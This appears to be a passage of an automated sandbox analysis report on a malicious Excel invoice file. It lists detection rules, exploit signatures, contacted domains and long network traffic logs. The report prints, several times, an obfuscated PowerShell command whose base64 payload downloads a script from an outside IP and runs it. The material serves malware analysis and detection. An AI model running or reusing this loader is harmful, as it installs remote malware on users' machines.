Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3220, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", CommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICA

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3688, TargetFilename: C:\Users\user\AppData\Local\Temp\dgi33iu0.y1c.ps1

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", ProcessId: 3928, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T10:53:54.536447+0100	2024197	1	A Network Trojan was detected	23.95.235.29	80	192.168.2.22	49162	TCP
2024-12-11T10:53:59.563742+0100	2024197	1	A Network Trojan was detected	23.95.235.29	80	192.168.2.22	49164	TCP

ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T10:53:54.536095+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49162	23.95.235.29	80	TCP
2024-12-11T10:53:59.563476+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49164	23.95.235.29	80	TCP
2024-12-11T10:54:22.930971+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49172	23.95.235.29	80	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T10:54:22.447546+0100	2049038	1	A Network Trojan was detected	151.101.1.137	443	192.168.2.22	49168	TCP
2024-12-11T10:54:41.001291+0100	2049038	1	A Network Trojan was detected	151.101.1.137	443	192.168.2.22	49174	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T10:54:07.351485+0100	2858795	1	A Network Trojan was detected	192.168.2.22	49165	23.95.235.29	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa	Avira URL Cloud: Label: malware
Source: https://short.ruksk.com/	Avira URL Cloud: Label: malware
Source: https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&k	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Invoice A037.xls	Virustotal: Detection: 19%			Perma Link
Source: Invoice A037.xls	ReversingLabs: Detection: 21%

Machine Learning detection for sample

Source: Invoice A037.xls

Joe Sandbox ML: detected

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgreatfeaturesreturnformebestthingsgivensoofar[1].hta, type: DROPPED

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.22:49173 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.pdb source: powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.pdbhP source: powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.pdb source: powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.pdbhP source: powershell.exe, 00000008.00000002.457674292.00000000030D7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: .pdbB source: powershell.exe, 00000016.00000002.501343114.000000001AD68000.00000004.00000020.00020000.00000000.sdmp

Spreading

Yara detected VBS Downloader Generic

Source: Yara match	File source: C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith[1].tiff, type: DROPPED

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: short.ruksk.com
Source: global traffic	DNS query: name: short.ruksk.com
Source: global traffic	DNS query: name: short.ruksk.com
Source: global traffic	DNS query: name: short.ruksk.com
Source: global traffic	DNS query: name: paste.rs
Source: global traffic	DNS query: name: paste.rs
Source: global traffic	DNS query: name: res.cloudinary.com
Source: global traffic	DNS query: name: res.cloudinary.com
Source: global traffic	DNS query: name: short.ruksk.com
Source: global traffic	DNS query: name: short.ruksk.com
Source: global traffic	DNS query: name: short.ruksk.com
Source: global traffic	DNS query: name: short.ruksk.com
Source: global traffic	DNS query: name: short.ruksk.com
Source: global traffic	DNS query: name: paste.rs
Source: global traffic	DNS query: name: paste.rs
Source: global traffic	DNS query: name: res.cloudinary.com
Source: global traffic	DNS query: name: res.cloudinary.com
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
